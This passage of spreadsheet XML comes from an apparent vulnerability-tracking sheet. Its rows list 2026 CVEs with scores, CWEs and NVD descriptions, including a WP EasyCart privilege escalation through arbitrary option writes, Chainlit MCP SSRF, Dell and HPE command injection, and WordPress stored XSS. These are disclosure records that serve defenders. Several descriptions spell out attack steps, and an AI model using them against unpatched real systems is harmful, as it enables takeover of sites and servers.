      <c r="E568" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F568" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G568" s="5" t="inlineStr"/>
      <c r="H568" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I568" s="5" t="inlineStr"/>
      <c r="J568" s="5" t="inlineStr"/>
      <c r="K568" s="5" t="inlineStr"/>
      <c r="L568" s="5" t="inlineStr"/>
      <c r="M568" s="5" t="inlineStr"/>
      <c r="N568" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O568" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P568" s="5" t="inlineStr"/>
      <c r="Q568" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="R568" s="5" t="inlineStr">
        <is>
          <t>The WP EasyCart plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 5.9.3. This is due to the ec_ajax_save_page_default_options() AJAX handler iterating over every $_POST key and passing it directly into update_option() without any allowlist, while gating the handler only on 'manage_options' OR the plugin's custom 'wpec_manager' capability. The plugin's built-in 'wpec_store_manager' role holds 'wpec_manager' but not 'manage_options', and the required nonce is emitted on frontend product/category templates that render for any user with 'wpec_manager'. This makes it possible for authenticated attackers, with Store Manager-level access and above, to elevate their privileges to administrator by updating arbitrary WordPress options such as default_role='administrator' and users_can_register='1', then self-registering a new account that is assigned the administrator role.</t>
        </is>
      </c>
      <c r="S568" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17553</t>
        </is>
      </c>
    </row>
    <row r="569">
      <c r="A569" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B569" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C569" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-23855</t>
        </is>
      </c>
      <c r="D569" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E569" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F569" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G569" s="5" t="inlineStr"/>
      <c r="H569" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I569" s="5" t="inlineStr"/>
      <c r="J569" s="5" t="inlineStr"/>
      <c r="K569" s="5" t="inlineStr"/>
      <c r="L569" s="5" t="inlineStr"/>
      <c r="M569" s="5" t="inlineStr"/>
      <c r="N569" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O569" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P569" s="5" t="inlineStr"/>
      <c r="Q569" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R569" s="5" t="inlineStr">
        <is>
          <t>Dell iDRAC9, 14G versions prior to 7.00.00.184, 15G/16G versions prior to 7.30.10.50, and Dell iDRAC10, 17G versions prior to 1.30.30.50, contain an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to command injection.</t>
        </is>
      </c>
      <c r="S569" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-23855</t>
        </is>
      </c>
    </row>
    <row r="570">
      <c r="A570" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B570" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C570" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45019</t>
        </is>
      </c>
      <c r="D570" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E570" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F570" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G570" s="5" t="inlineStr"/>
      <c r="H570" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I570" s="5" t="inlineStr"/>
      <c r="J570" s="5" t="inlineStr"/>
      <c r="K570" s="5" t="inlineStr"/>
      <c r="L570" s="5" t="inlineStr"/>
      <c r="M570" s="5" t="inlineStr"/>
      <c r="N570" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O570" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P570" s="5" t="inlineStr"/>
      <c r="Q570" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R570" s="5" t="inlineStr">
        <is>
          <t>Chainlit is a Python framework for building production-ready conversational AI applications. From 2.4.0rc0 until 2.12.0, Chainlit deployments with features.mcp.enabled set to true in .chainlit/config.toml expose the POST /mcp endpoint without requiring authentication. For sse and streamable-http transports, ConnectSseMCPRequest and ConnectStreamableHttpMCPRequest in backend/chainlit/types.py accept a user-controlled url and optional headers dictionary without scheme validation, private-address filtering, or an allowlist. The connect_mcp handler in backend/chainlit/server.py passes these values to sse_client() or streamablehttp_client(), allowing the Chainlit server to make blind outbound requests to arbitrary internal or external services, including cloud metadata endpoints, with attacker-controlled Authorization and Cookie headers. The SSE URL sink has existed since 2.4.0rc0, while attacker-controlled header forwarding and streamable-http support were added in 2.6.4. The response is consumed internally and not returned, but the attacker can issue state-changing authenticated requests, discover internal services, scan ports, and probe metadata endpoints. This issue is fixed in version 2.12.0.</t>
        </is>
      </c>
      <c r="S570" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45019</t>
        </is>
      </c>
    </row>
    <row r="571">
      <c r="A571" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B571" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C571" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53499</t>
        </is>
      </c>
      <c r="D571" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E571" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F571" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G571" s="5" t="inlineStr"/>
      <c r="H571" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I571" s="5" t="inlineStr"/>
      <c r="J571" s="5" t="inlineStr"/>
      <c r="K571" s="5" t="inlineStr"/>
      <c r="L571" s="5" t="inlineStr"/>
      <c r="M571" s="5" t="inlineStr"/>
      <c r="N571" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O571" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P571" s="5" t="inlineStr"/>
      <c r="Q571" s="5" t="inlineStr">
        <is>
          <t>CWE-346</t>
        </is>
      </c>
      <c r="R571" s="5" t="inlineStr">
        <is>
          <t>FORT Validator is a Resource Public Key Infrastructure (RPKI) relying-party validator that produces validated route-origin data. FORT Validator versions through 1.6.7 contain an origin-validation error in their RRDP processing: a delegated CA under the same Trust Anchor Locator (TAL) can reference a victim CA’s public RRDP notification and snapshot URLs, causing FORT’s URL-based download cache to report success after deleting the victim’s local snapshot. Following a routine victim publication, this can silently remove the victim’s VRPs and other signed objects from FORT’s output, potentially enabling route hijacking or loss of reachability. Version 1.6.8 contains a patch that rejects cross-origin RRDP snapshot and delta URLs; as a workaround, administrators can disable HTTP/RRDP with  --http.enabled=false  while keeping rsync enabled, although this can leave data unavailable or stale where rsync is not supported.</t>
        </is>
      </c>
      <c r="S571" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53499</t>
        </is>
      </c>
    </row>
    <row r="572">
      <c r="A572" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B572" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C572" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54718</t>
        </is>
      </c>
      <c r="D572" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E572" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F572" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G572" s="5" t="inlineStr"/>
      <c r="H572" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I572" s="5" t="inlineStr"/>
      <c r="J572" s="5" t="inlineStr"/>
      <c r="K572" s="5" t="inlineStr"/>
      <c r="L572" s="5" t="inlineStr"/>
      <c r="M572" s="5" t="inlineStr"/>
      <c r="N572" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O572" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="P572" s="5" t="inlineStr"/>
      <c r="Q572" s="5" t="inlineStr">
        <is>
          <t>CWE-1336</t>
        </is>
      </c>
      <c r="R572" s="5" t="inlineStr">
        <is>
          <t>Silverstripe Advanced Workflow is a highly configurable step-based workflow module. Prior to 6.4.5, 7.1.3, and 7.2.1, an attacker with permission to author the advanced workflow email template can place a specially crafted server-side template payload in NotifyUsersWorkflowAction.EmailTemplate. When NotifyUsersWorkflowAction renders the field through the Silverstripe template engine SSTemplateParser, the payload can cause PHP evaluation and arbitrary code execution on the server; the regression coverage is in tests/php/WorkflowEngineTest.php. This issue is fixed in versions 6.4.5, 7.1.3, and 7.2.1.</t>
        </is>
      </c>
      <c r="S572" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54718</t>
        </is>
      </c>
    </row>
    <row r="573">
      <c r="A573" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B573" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C573" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6431</t>
        </is>
      </c>
      <c r="D573" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E573" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F573" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G573" s="5" t="inlineStr"/>
      <c r="H573" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I573" s="5" t="inlineStr"/>
      <c r="J573" s="5" t="inlineStr"/>
      <c r="K573" s="5" t="inlineStr"/>
      <c r="L573" s="5" t="inlineStr"/>
      <c r="M573" s="5" t="inlineStr"/>
      <c r="N573" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O573" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P573" s="5" t="inlineStr"/>
      <c r="Q573" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R573" s="5" t="inlineStr">
        <is>
          <t>The User Profile Builder – Beautiful User Registration Forms, User Profiles &amp; User Role Editor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Biographical Info' meta field parameter in all versions up to, and including, 3.15.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</t>
        </is>
      </c>
      <c r="S573" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6431</t>
        </is>
      </c>
    </row>
    <row r="574">
      <c r="A574" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B574" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C574" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73769</t>
        </is>
      </c>
      <c r="D574" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E574" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F574" s="5" t="inlineStr">
        <is>
          <t>security-alert@hpe.com</t>
        </is>
      </c>
      <c r="G574" s="5" t="inlineStr"/>
      <c r="H574" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I574" s="5" t="inlineStr"/>
      <c r="J574" s="5" t="inlineStr"/>
      <c r="K574" s="5" t="inlineStr"/>
      <c r="L574" s="5" t="inlineStr"/>
      <c r="M574" s="5" t="inlineStr"/>
      <c r="N574" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O574" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P574" s="5" t="inlineStr"/>
      <c r="Q574" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R574" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the web-based management interface of vulnerable CPPM systems could allow an authenticated remote attacker to achieve remote code execution. Successful exploitation could allow an attacker to execute arbitrary commands on the underlying operating system.</t>
        </is>
      </c>
      <c r="S574" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73769</t>
        </is>
      </c>
    </row>
    <row r="575">
      <c r="A575" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B575" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C575" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73787</t>
        </is>
      </c>
      <c r="D575" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E575" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F575" s="5" t="inlineStr">
        <is>
          <t>security-alert@hpe.com</t>
        </is>
      </c>
      <c r="G575" s="5" t="inlineStr"/>
      <c r="H575" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I575" s="5" t="inlineStr"/>
      <c r="J575" s="5" t="inlineStr"/>
      <c r="K575" s="5" t="inlineStr"/>
      <c r="L575" s="5" t="inlineStr"/>
      <c r="M575" s="5" t="inlineStr"/>
      <c r="N575" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O575" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P575" s="5" t="inlineStr"/>
      <c r="Q575" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R575" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the CPPM web interface could allow an authenticated remote attacker to access directory information on a vulnerable system. Successful exploitation could allow an attacker to execute arbitrary commands on the underlying operating system.</t>
        </is>
      </c>
      <c r="S575" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73787</t>
        </is>
      </c>
    </row>
    <row r="576">
      <c r="A576" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B576" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C576" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75927</t>
        </is>
      </c>
      <c r="D576" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E576" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F576" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G576" s="5" t="inlineStr"/>
      <c r="H576" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I576" s="5" t="inlineStr"/>
      <c r="J576" s="5" t="inlineStr"/>
      <c r="K576" s="5" t="inlineStr"/>
      <c r="L576" s="5" t="inlineStr"/>
      <c r="M576" s="5" t="inlineStr"/>
      <c r="N576" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O576" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P576" s="5" t="inlineStr"/>
      <c r="Q576" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="R576" s="5" t="inlineStr">
        <is>
          <t>The PublishPress Capabilities – User Role Editor, Access Permissions, User Capabilities, Admin Menus plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 2.50.0. This is due to the `addPluginCapabilities()` function unconditionally granting the Editor role all 15 `manage_capabilities_*` capabilities — including `manage_capabilities`, `manage_capabilities_roles`, `manage_capabilities_settings`, and `manage_capabilities_backup` — via a hard-coded `$eligible_roles = ['administrator', 'editor']` assignment that runs automatically on the first `admin_init` after plugin activation with no administrator opt-in, persisting the grants directly to the database. This makes it possible for authenticated attackers with Editor-level access to elevate their privileges to a site-wide capability manager, enabling them to create, rename, and delete non-system roles, modify capabilities of non-administrator roles, restore role backups, and write arbitrary plugin options whose names begin with `cme_`, `capsman`, `pp_capabilities`, or `presspermit` via `update_option()`. The escalation stops short of full Administrator access, as WordPress's `map_meta_cap` layer still prevents the escalated Editor from granting administrator-only capabilities to other roles; however, all role-management and plugin-settings functionality gated solely on `manage_capabilities_*` capabilities remains fully accessible.</t>
        </is>
      </c>
      <c r="S576" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75927</t>
        </is>
      </c>
    </row>
    <row r="577">
      <c r="A577" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B577" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C577" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79426</t>
        </is>
      </c>
      <c r="D577" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E577" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F577" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G577" s="5" t="inlineStr"/>
      <c r="H577" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I577" s="5" t="inlineStr"/>
      <c r="J577" s="5" t="inlineStr"/>
      <c r="K577" s="5" t="inlineStr"/>
      <c r="L577" s="5" t="inlineStr"/>
      <c r="M577" s="5" t="inlineStr"/>
      <c r="N577" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O577" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P577" s="5" t="inlineStr"/>
      <c r="Q577" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="R577" s="5" t="inlineStr">
        <is>
          <t>An arbitrary file deletion vulnerability in the /adminapi/file/video_data_save component of CRMEB v6.0.0 allows authenticated attackers to delete arbitrary files via crafted POST request.</t>
        </is>
      </c>
      <c r="S577" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79426</t>
        </is>
      </c>
    </row>
    <row r="578">
      <c r="A578" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B578" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C578" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79972</t>
        </is>
      </c>
      <c r="D578" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E578" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F578" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G578" s="5" t="inlineStr"/>
      <c r="H578" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I578" s="5" t="inlineStr"/>
      <c r="J578" s="5" t="inlineStr"/>
      <c r="K578" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L578" s="5" t="inlineStr"/>
      <c r="M578" s="5" t="inlineStr"/>
      <c r="N578" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O578" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P578" s="5" t="inlineStr"/>
      <c r="Q578" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R578" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to unauthorized access.</t>
        </is>
      </c>
      <c r="S578" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79972</t>
        </is>
      </c>
    </row>
    <row r="579">
      <c r="A579" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B579" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C579" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83593</t>
        </is>
      </c>
      <c r="D579" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E579" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F579" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G579" s="5" t="inlineStr"/>
      <c r="H579" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I579" s="5" t="inlineStr"/>
      <c r="J579" s="5" t="inlineStr"/>
      <c r="K579" s="5" t="inlineStr"/>
      <c r="L579" s="5" t="inlineStr"/>
      <c r="M579" s="5" t="inlineStr"/>
      <c r="N579" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O579" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P579" s="5" t="inlineStr"/>
      <c r="Q579" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R579" s="5" t="inlineStr">
        <is>
          <t>The WPBot – AI ChatBot for Live Support, Lead Generation, AI Services plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'conversation' parameter in all versions up to, and including, 8.7.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The action is gated only by a nonce that is localized into every public-facing page via wp_localize_script, rendering the nonce check ineffective as an access control barrier for unauthenticated users.</t>
        </is>
      </c>
      <c r="S579" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83593</t>
        </is>
      </c>
    </row>
    <row r="580">
      <c r="A580" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B580" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C580" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84293</t>
        </is>
      </c>
      <c r="D580" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E580" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F580" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G580" s="5" t="inlineStr"/>
      <c r="H580" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I580" s="5" t="inlineStr"/>
      <c r="J580" s="5" t="inlineStr"/>
      <c r="K580" s="5" t="inlineStr"/>
      <c r="L580" s="5" t="inlineStr"/>
      <c r="M580" s="5" t="inlineStr"/>
      <c r="N580" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O580" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P580" s="5" t="inlineStr"/>
      <c r="Q580" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R580" s="5" t="inlineStr">
        <is>
          <t>The Repeater Fields for Gravity Forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Repeated Multi-Input Sub-Field Values in all versions up to, and including, 3.0.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This vulnerability only affects multi-input sub-field types within a repeater (such as Name, Address, and Checkbox fields), as scalar single-input field values are escaped with esc_html() at the output stage in version 3.0.4.</t>
        </is>
      </c>
      <c r="S580" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84293</t>
        </is>
      </c>
    </row>
    <row r="581">
      <c r="A581" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B581" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C581" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86544</t>
        </is>
      </c>
      <c r="D581" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E581" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F581" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G581" s="5" t="inlineStr"/>
      <c r="H581" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I581" s="5" t="inlineStr"/>
      <c r="J581" s="5" t="inlineStr"/>
      <c r="K581" s="5" t="inlineStr"/>
      <c r="L581" s="5" t="inlineStr"/>
      <c r="M581" s="5" t="inlineStr"/>
      <c r="N581" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O581" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P581" s="5" t="inlineStr"/>
      <c r="Q581" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R581" s="5" t="inlineStr">
        <is>
          <t>knowns versions before 0.30.0 contain an authorization bypass vulnerability where mutating code actions are incorrectly classified as read-only operations. Attackers with read-restricted sessions can exploit code.replace to modify permission configurations and escalate privileges on subsequent calls.</t>
        </is>
      </c>
      <c r="S581" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86544</t>
        </is>
      </c>
    </row>
    <row r="582">
      <c r="A582" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B582" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C582" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87021</t>
        </is>
      </c>
      <c r="D582" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E582" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F582" s="5" t="inlineStr">
        <is>
          <t>3938794e-25f5-4123-a1ba-5cbd7f104512</t>
        </is>
      </c>
      <c r="G582" s="5" t="inlineStr"/>
      <c r="H582" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I582" s="5" t="inlineStr"/>
      <c r="J582" s="5" t="inlineStr"/>
      <c r="K582" s="5" t="inlineStr">
        <is>
          <t>tanium:comply</t>
        </is>
      </c>
      <c r="L582" s="5" t="inlineStr"/>
      <c r="M582" s="5" t="inlineStr"/>
      <c r="N582" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O582" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P582" s="5" t="inlineStr"/>
      <c r="Q582" s="5" t="inlineStr">
        <is>
          <t>CWE-1336</t>
        </is>
      </c>
      <c r="R582" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed an unauthorized code execution vulnerability in Comply.</t>
        </is>
      </c>
      <c r="S582" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87021</t>
        </is>
      </c>
    </row>
    <row r="583">
      <c r="A583" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B583" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C583" s="5" t="inlineStr">
        <is>
          <t>CVE-2021-48007</t>
        </is>
      </c>
      <c r="D583" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E583" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F583" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G583" s="5" t="inlineStr"/>
      <c r="H583" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I583" s="5" t="inlineStr"/>
      <c r="J583" s="5" t="inlineStr"/>
      <c r="K583" s="5" t="inlineStr"/>
      <c r="L583" s="5" t="inlineStr"/>
      <c r="M583" s="5" t="inlineStr"/>
      <c r="N583" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O583" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="P583" s="5" t="inlineStr"/>
      <c r="Q583" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R583" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP versions before 3.18.1 fail to validate NaN or INF values in MovePlayerPacket position and rotation fields. Malicious clients can send crafted movement packets with invalid floating-point values to crash servers through unhandled mathematical operations or prevent clients from rendering other players.</t>
        </is>
      </c>
